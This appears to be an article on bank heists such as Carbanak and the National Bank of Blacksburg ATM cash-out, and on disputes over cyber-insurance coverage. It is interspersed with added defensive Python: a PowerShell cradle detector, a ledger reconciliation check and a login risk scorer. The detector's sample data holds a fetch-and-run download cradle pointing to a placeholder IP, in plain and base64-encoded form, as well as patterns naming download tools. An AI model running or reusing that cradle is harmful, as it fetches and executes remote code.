Bank Hack Tales: When What's Old is New Again


More and more, corporate boards are mandating cyber insurance to transfer risk, but watch out, because you might not get what you paid for. A recent International Monetary Fund (IMF) report estimates that annual banking losses could be as high as "9% of net income or $100 billion annually."

Bank breaches threaten both the viability of the bank and its customers' ability to transfer funds or access their accounts. JP Morgan reports that "78% of companies were targets of payment fraud last year... 54% of business email compromise (BEC) scams targeted wires and 28% were subject to ACH debit fraud."

In the 2016 Bangladesh Bank cyber heist, $81 million disappeared in no time, and, but for a typo the hackers made in one of their payment orders, it could have been close to $1 billion. The SWIFT messaging system serves over 11,000 banks and relies on each member bank to secure its own access to the network.

More recently, Banco de Chile lost $10 million to hackers who used SWIFT to send the money to Hong Kong; the bank is now working with insurers to recoup its losses. Bloomberg reports that in May of this year $15 million was stolen from Mexican banks when hackers attacked SPEI, the domestic payments system run by the central bank, Banxico. And Bancomext was targeted by hackers, reported to be North Korean, who attempted to steal $110 million; the attempt resulted in the bank's international payments system being frozen.

The Silence Before the (Banking) Storm

Criminal syndicates have been using malware for years in multi-stage attacks that take advantage of unpatched systems, untrained users and weak processes. These kinds of hackers are incredibly patient and creative.

Industry veteran Scott Scheferman described the attackers as “a criminal ring with many operative layers that work in coordination.... it’s not unusual at all for the threat to stay in ‘monitor’ mode for extended periods of time before performing the ‘power moves’ at the end of the heist." 

For example, the notorious FIN7, also known as the Carbanak gang and known for its multi-purpose malware, stole over $1 billion from more than 100 banks over several years. What made Carbanak so successful against banks? Its malware combined keylogging, form grabbing, point-of-sale (POS) and HTTP monitoring, and desktop video capture to steal banking data and to learn how bank staff used their internal systems.

In August 2018, the Department of Justice indicted three Carbanak gang leaders on 26 counts, including conspiracy to commit wire and bank fraud and computer hacking. FIN7 had set up a front company, Combi Security, posing as a penetration-testing firm to cover its activities, and used the instant messengers Jabber and HipChat to share files and instructions among its members.

It’s hard to disentangle the many aspects of these breaches. Some are targeted or use insiders, others rely on social engineering, and many are the result of malvertising encountered during innocent browsing. Users click on shady links or enable dangerous macros in Word documents that arrive as fake invoices or bogus IRS communications - as in this example. And with so much data scraped from LinkedIn, Facebook and the online dumps from recent data breaches, phishing remains the most likely way for attackers to establish the foothold they need.

Many 2017 bank hacks used the Emotet banking malware, which evades sandbox detection and uses PowerShell and other ‘living off the land’ techniques to download additional malware payloads.

The current one-two punch is Smokeloader followed by Trickbot (a banking trojan and credential stealer). Endpoints can be compromised in seconds, and unless they have protections against malicious scripts and new malware variants, they become the first stage of a multi-stage attack. The hackers collect usernames and passwords, move laterally to other workstations, repeat the process, and use video and keystroke capture to watch how operators transfer money in third-party systems like SWIFT, SPEI, the STAR network or Navigator.
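The PowerShell download cradle is the one stage of this chain that almost always leaves a trace in process-creation telemetry. The script below, an added example that is not code from the article, scores PowerShell launches for the combination of download primitives, evasion flags and an Office parent process that characterises a macro-launched loader, and decodes `-EncodedCommand` payloads (base64 over UTF-16LE) so that hiding the cradle behind `-e` does not defeat the match. The log lines are constructed; the tab-separated layout (time, host, parent image, image, command line), the field names and the scoring weights are assumptions.

```python
"""Flag PowerShell 'living off the land' download cradles in process-creation
logs. Added example, not code from the article. The log lines below are
constructed; the tab-separated layout (time, host, parent image, image,
command line) and the scoring are assumptions."""
import base64
import re

# Primitives a loader stage needs: fetch something, then execute it in memory.
CRADLE_PATTERNS = {
    "webclient": re.compile(r"Net\.WebClient", re.I),
    "download": re.compile(r"Download(?:String|File|Data)\b", re.I),
    "webrequest": re.compile(r"Invoke-WebRequest|\biwr\b|\bcurl\b|\bwget\b", re.I),
    "invoke_expression": re.compile(r"Invoke-Expression|\biex\b", re.I),
    "bits": re.compile(r"Start-BitsTransfer|bitsadmin", re.I),
}
# Flags that hide the window, skip the profile, or hide the script itself.
EVASION_FLAGS = {
    "encoded": re.compile(r"\s-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I),
    "noprofile": re.compile(r"\s-(?:nop|noprofile)\b", re.I),
    "hidden": re.compile(r"\s-w(?:indowstyle)?\s+hidden\b", re.I),
    "bypass": re.compile(r"\s-(?:ep|executionpolicy)\s+bypass\b", re.I),
}
OFFICE_PARENTS = {"winword.exe", "excel.exe", "outlook.exe", "powerpnt.exe"}


def decode_encoded_command(cmdline):
    """Plaintext of a -EncodedCommand argument (base64 over UTF-16LE), or ''."""
    m = EVASION_FLAGS["encoded"].search(cmdline)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return ""


def parse_line(line):
    time, host, parent_image, image, command_line = line.split("\t", 4)
    return {"time": time, "host": host, "parent_image": parent_image,
            "image": image, "command_line": command_line}


def analyze_event(event):
    """Score one process-creation event; None if it is not a PowerShell launch."""
    if not event["image"].lower().endswith(("powershell.exe", "pwsh.exe")):
        return None
    cmdline = event["command_line"]
    decoded = decode_encoded_command(cmdline)
    # With -e the real script is the decoded text; otherwise it is the command line.
    script = decoded or cmdline
    reasons = [name for name, rx in CRADLE_PATTERNS.items() if rx.search(script)]
    reasons += [name for name, rx in EVASION_FLAGS.items() if rx.search(cmdline)]
    parent = event["parent_image"].lower().rsplit("\\", 1)[-1]
    if parent in OFFICE_PARENTS:
        reasons.append("office_parent")  # macro-spawned shell: the phishing-lure path
    return {"host": event["host"], "time": event["time"],
            "score": len(reasons), "reasons": reasons, "decoded": decoded}


def analyze(lines, threshold=3):
    """Return findings at or above threshold, in log order."""
    findings = []
    for line in lines:
        result = analyze_event(parse_line(line))
        if result and result["score"] >= threshold:
            findings.append(result)
    return findings


# Constructed sample events (not real telemetry); hosts and paths are invented.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
CRADLE = "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.10/inv.ps1')"
ENCODED = base64.b64encode(CRADLE.encode("utf-16-le")).decode("ascii")
SAMPLE_EVENTS = [
    ("2017-11-02T08:02:11Z", "WS-ADMIN-01", r"C:\Windows\explorer.exe", PS,
     r"powershell.exe -NoProfile -File C:\Scripts\backup.ps1"),
    ("2017-11-02T09:14:05Z", "WS-TELLER-07",
     r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE", PS,
     "powershell.exe -nop -w hidden -ep bypass -e " + ENCODED),
    ("2017-11-02T09:14:09Z", "WS-TELLER-07", r"C:\Windows\explorer.exe",
     r"C:\Windows\System32\notepad.exe", "notepad.exe invoice.txt"),
    ("2017-11-02T11:40:51Z", "WS-TELLER-03", r"C:\Windows\System32\cmd.exe", PS,
     'powershell -w hidden -c "' + CRADLE.replace("203.0.113.10/inv", "198.51.100.7/a") + '"'),
]
LOG_LINES = ["\t".join(fields) for fields in SAMPLE_EVENTS]

if __name__ == "__main__":
    for f in analyze(LOG_LINES):
        print(f["host"], f["score"], ",".join(f["reasons"]))
        if f["decoded"]:
            print("  decoded:", f["decoded"])
```

The admin's `-NoProfile -File backup.ps1` scores one point and stays below the threshold; the Word-spawned encoded cradle scores eight and the plaintext cradle launched from cmd.exe scores four. The threshold is a tuning knob: a single evasion flag is routine in legitimate automation, whereas a download primitive next to an execution primitive is rarely benign on a teller workstation.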

With access to these third-party services, the hackers can corrupt the integrity of account data by temporarily inflating customer balances, which money mules then cash out at ATMs before the edit is noticed.
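A direct balance edit has one tell: it never appears as a posted transaction, so the ledger no longer explains the balance. The following added example (not code from the article) replays a small constructed ledger, reports every account whose reported balance differs from what its transactions support, and replays the withdrawals in posting order to measure how much was pulled out that the ledger never funded. The record layout (integer cents, account ids, transaction dicts) and the sample data are assumptions.

```python
"""Reconcile the balances a core system reports against the transactions it
actually posted, to catch balances that were edited directly. Added example,
not code from the article; the ledger layout (integer cents, account ids,
transaction dicts) and the sample data are constructed assumptions."""


def reconcile(opening_balances, transactions, reported_balances):
    """Recompute every account from its ledger and return {account: unexplained
    delta in cents} for each account whose reported balance does not match."""
    expected = dict(opening_balances)
    for tx in transactions:
        expected[tx["account"]] = expected.get(tx["account"], 0) + tx["amount"]
    return {acct: reported - expected.get(acct, 0)
            for acct, reported in reported_balances.items()
            if reported != expected.get(acct, 0)}


def unfunded_withdrawals(opening_balances, transactions):
    """Replay the ledger in posting order and return {account: cents} of
    withdrawals that exceeded what the ledger could fund. On a tampered
    account this is the money the mules actually walked away with."""
    running = dict(opening_balances)
    unfunded = {}
    for tx in transactions:
        acct = tx["account"]
        new_balance = running.get(acct, 0) + tx["amount"]
        if tx["amount"] < 0 and new_balance < 0:
            shortfall = min(-tx["amount"], -new_balance)
            unfunded[acct] = unfunded.get(acct, 0) + shortfall
        running[acct] = new_balance
    return unfunded


# Constructed sample ledger (cents). Account 1003's balance was raised by a
# direct edit that was never posted as a transaction; $3,000 was then pulled
# out at ATMs, of which only $10 was ever funded by real deposits.
OPENING = {"1001": 50_000, "1002": 120_000, "1003": 2_500}
TRANSACTIONS = [
    {"account": "1001", "amount": -2_000, "channel": "POS"},
    {"account": "1002", "amount": 500_000, "channel": "WIRE_IN"},
    {"account": "1003", "amount": -1_500, "channel": "ATM"},
    {"account": "1003", "amount": -100_000, "channel": "ATM"},
    {"account": "1003", "amount": -100_000, "channel": "ATM"},
    {"account": "1003", "amount": -100_000, "channel": "ATM"},
]
REPORTED = {"1001": 48_000, "1002": 620_000, "1003": 8_700_000}

if __name__ == "__main__":
    print("unexplained balance deltas:", reconcile(OPENING, TRANSACTIONS, REPORTED))
    print("withdrawals the ledger never funded:", unfunded_withdrawals(OPENING, TRANSACTIONS))
```

Run this against the core system's own transaction feed rather than the balance table it exposes, and run it often: the NBB-style attack depends on the edit surviving until the ATM withdrawals clear. Accounts with an authorised overdraft facility need their limit added to the opening balance before the unfunded-withdrawal replay is meaningful.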

The Impact of GDPR on Banking Fraud

It's no wonder that stringent rules for network monitoring and multi-factor authentication (MFA) are emerging in the newly published GDPR and in US regulations. Hackers are monitoring users, collecting passwords and then accessing payment systems to wire out funds or to send payment card data for use in ATM cash-out schemes. Authentication systems used to reach payment systems should take more attributes about the user into account and apply a real-time risk score that both verifies the identity and correlates anomalous activity with known malicious behaviour.
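One way to turn that recommendation into code, as an added example that is not the article's or any vendor's implementation: score each payment-system session on the device, the geography relative to the last known session (an impossible-travel check), the hour, the amount against the user's own history and the beneficiary, then allow, step up to a second factor, or deny. The attribute names, weights, thresholds and sample sessions are assumptions.

```python
"""Risk-score a payment-system session from several user attributes and
decide whether to allow, step up authentication, or deny. Added example, not
from the article; attribute names, weights, thresholds and sample data are
assumptions."""
import math

WEIGHTS = {
    "unknown_device": 30,
    "impossible_travel": 40,
    "off_hours": 10,
    "amount_outlier": 20,
    "new_beneficiary": 20,
}
MAX_PLAUSIBLE_KMH = 900.0  # faster than this between two sessions is not travel


def km_between(a, b):
    """Great-circle (haversine) distance in km between two (lat, lon) in degrees."""
    lat1, lon1 = map(math.radians, a)
    lat2, lon2 = map(math.radians, b)
    h = (math.sin((lat2 - lat1) / 2) ** 2
         + math.cos(lat1) * math.cos(lat2) * math.sin((lon2 - lon1) / 2) ** 2)
    return 2 * 6371.0 * math.asin(math.sqrt(h))


def score_session(event, profile):
    """Return (score, reasons) for one login-plus-payment attempt."""
    reasons = []
    if event["device_id"] not in profile["known_devices"]:
        reasons.append("unknown_device")
    last = profile["last_seen"]
    hours = max((event["ts"] - last["ts"]) / 3600.0, 1e-6)  # guard divide-by-zero
    if km_between(last["coords"], event["coords"]) / hours > MAX_PLAUSIBLE_KMH:
        reasons.append("impossible_travel")
    start, end = profile["work_hours"]
    if not start <= event["local_hour"] < end:
        reasons.append("off_hours")
    if event["amount_cents"] > profile["p95_amount_cents"]:
        reasons.append("amount_outlier")
    if event["beneficiary"] not in profile["known_beneficiaries"]:
        reasons.append("new_beneficiary")
    return sum(WEIGHTS[r] for r in reasons), reasons


def decide(score):
    """Map a score to an action; the bands are policy, tune them per system."""
    if score < 25:
        return "allow"
    if score < 60:
        return "step_up"
    return "deny"


# Constructed profile and sessions (not real data). Coordinates are
# Blacksburg, VA and Berlin; timestamps are epoch seconds.
PROFILE = {
    "known_devices": {"WS-TELLER-07-a1b2"},
    "last_seen": {"coords": (37.23, -80.41), "ts": 1_500_000_000},
    "work_hours": (8, 18),
    "p95_amount_cents": 250_000,
    "known_beneficiaries": {"ACME-PAYROLL"},
}
ROUTINE = {"device_id": "WS-TELLER-07-a1b2", "coords": (37.23, -80.41),
           "ts": 1_500_003_600, "local_hour": 10, "amount_cents": 120_000,
           "beneficiary": "ACME-PAYROLL"}
STEP_UP = {"device_id": "WS-TELLER-07-a1b2", "coords": (37.23, -80.41),
           "ts": 1_500_007_200, "local_hour": 14, "amount_cents": 900_000,
           "beneficiary": "NEW-VENDOR"}
ATTACK = {"device_id": "unknown-9f3e", "coords": (52.52, 13.40),
          "ts": 1_500_007_200, "local_hour": 3, "amount_cents": 2_500_000,
          "beneficiary": "MULE-ACCT"}

if __name__ == "__main__":
    for name, ev in (("routine", ROUTINE), ("step_up", STEP_UP), ("attack", ATTACK)):
        score, reasons = score_session(ev, PROFILE)
        print(f"{name}: score={score} {decide(score)} {reasons}")
```

The attacker session trips the impossible-travel rule because Berlin is roughly 7,000 km from the last session two hours earlier; that one signal plus an unknown device is already a deny, which matters because a keylogger hands the attacker a valid password and a valid OTP typed by the user, but not the user's workstation or location.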

But even with regulations in place, breach reports cite a lack of controls or technology capable of preventing one or more phases of the attack. A good red team will surface these weaknesses before the bad guys do.

Most people agree that risk transfer via insurance is necessary to account for gaps in security. For example, Brian Krebs recently reported on a hack of the National Bank of Blacksburg (NBB). Account balances were increased, stolen credentials gave the attackers access to the First Data STAR network for ATMs, and a mule cash-out operation yielded $2.4 million over two separate incidents. In the first, in May 2016, NBB is thought to have been phished by Russian attackers and $569k was taken from ATMs. In the second, in January 2017, a further $1.8 million was stolen the same way.

"Repeat attacks are common and often successful because they know the environment," adds Cylance’s Scheferman. Now, two years later, we are learning the details because the insurer is denying coverage. This hack is very similar to the RBS Worldpay incident, when hackers broke the encryption on debit cards and used over 2,000 ATMs to cash out $9 million over a single weekend.

Sign of the Changing Times

The National Bank of Blacksburg incident doesn’t read like a garden-variety phishing scam. The malware, the monitoring, the lateral movement and the control over financial workstations (enabling the production of debit cards used by money mules) mark it as a persistent, sophisticated intrusion. International cybersecurity expert Bryan Cunningham points to a problem with insurance cover: "There remains vigorous disagreement – and little clear legal precedent – on basic definitions of terms in cyber insurance policies."

And as the cyber insurance market has added new policy forms to cover emerging risks like social engineering, carriers have excluded those types of attacks from existing policies. "Traditional crime and FI bond policies are designed to cover losses that arise from embezzlement by employees [where] social engineering attacks are made by external actors, not employees," offered David Lewison, co-leader of the AmWINS Financial Services National Practice. And with the new products, "carriers have sublimited social engineering fraud to low levels due to high volume of claims," adds Ryan Gibney at Lockton, the world’s largest privately held independent insurance broker.

NBB had purchased an $8 million Computer & Electronic Crime rider to its financial bond. The CE Rider covers a "loss resulting directly from an unauthorized party acting alone or in collusion with others, entering or changing Electronic Data or Computer Programs [which] causes property to be transferred, paid or delivered..." NBB also purchased a $50,000 Debit Card Rider to cover lost or stolen debit cards that might be used at ATMs.

NBB argues that the primary attack was against the NBB network, which enabled the hackers to access the STAR and Navigator systems, change balances, steal account data and ultimately cash out via the ATMs. The bond, however, also excluded coverage for “loss resulting directly or indirectly from the use or purported use, of credit, debit [cards] used in [ATMs]."

So does the Debit Card Rider, which specifically names the ATM, become the operative policy? "We would expect many crime carriers to try and pigeonhole the coverage through a small sublimit that they apply for social engineering fraud due to the phishing email initial access and behind the scenes criminal activities," said Gibney.

I recently spoke with coverage counsel Scott Godes about NBB and his reaction was, "The loss should be seen as within the heart of the coverage of the policy, particularly the crime rider. One would hope that the insurance carrier should carry the burden of proving that a sublimit applies, as a restriction on coverage."

Recurrent Attacks: a Reasonable Expectation?

Given the history of bank hacks going back to the RBS Worldpay incident, what happened in Blacksburg was foreseeable, or 'reasonable' to expect. "Exclusions and limitations on coverage in insurance policies should be read narrowly, and insurance carriers should not be rewarded for reading them broadly", noted Scott N. Godes, a cyber insurance and commercial litigator.

Here, the exclusion seems to swallow the coverage. The insurer is calling this a single incident. "The crime policy is most likely an occurrence-based policy and the bank should not have coverage limited because the event happened multiple times," stated Lockton’s Gibney.

Buying these policies is complex, however. Godes adds that "insurance carriers should sell products with robust coverage, so that policyholders do not fall through hidden trapdoors at the time of a claim." NBB’s position that the ATM cash-out could not have occurred but for the intrusion into its own systems has support from a recent federal appeals court decision in the Second Circuit, Medidata Solutions, Inc. v. Federal Insurance Co. In Medidata, Godes noted, the court ruled that the crime insurance policy provided coverage for a fraudulent scheme and wire transfer, even though the insurer claimed it was not a direct loss.

The court rejected the arguments that the loss was not “direct” because there were steps in between the original fraudulent message and the wiring of funds. This result is favorable for victims of complex phishing and malware attacks.

Conclusion

For those currently looking for cyber insurance, David Lewison suggested some practical steps to get the right coverage.

· "Work with a broker that specializes in Cyber-liability and Crime/Bond, from the same brokerage;

· Hold an underwriting/broker meeting or conference call so you can ask questions about who has the ball when something bad happens;

· Prior to binding coverage, put both policy forms and all endorsements side by side and verify that the coverage has been assembled as intended;

· It may also be worthwhile for larger insurance buyers to include a claims leader from the insurance company on a call, so you know who you are dealing with at the time of claim."

And, to avoid ending up in court, involve counsel and review your existing and proposed new policies before you buy.

More articles by Barnaby Page:

  • Ransom Payments and Victim Notice Requirements Come under Federal Scrutiny
  • Ransomware and the Perils of Paying
  • Defeating Ransomware | Outflanking Attackers through Public-Private Cooperation
  • M&A Issues have Cyber Front & Center
  • Ransomware not Dead
  • DDoS business impact requires Focus
  • Credit Bureau Overhaul Past Due
  • Targeted Ransomware requires Identity upgrade
  • Health Data Ransom Evolves
  • Inoculate Against Ransomware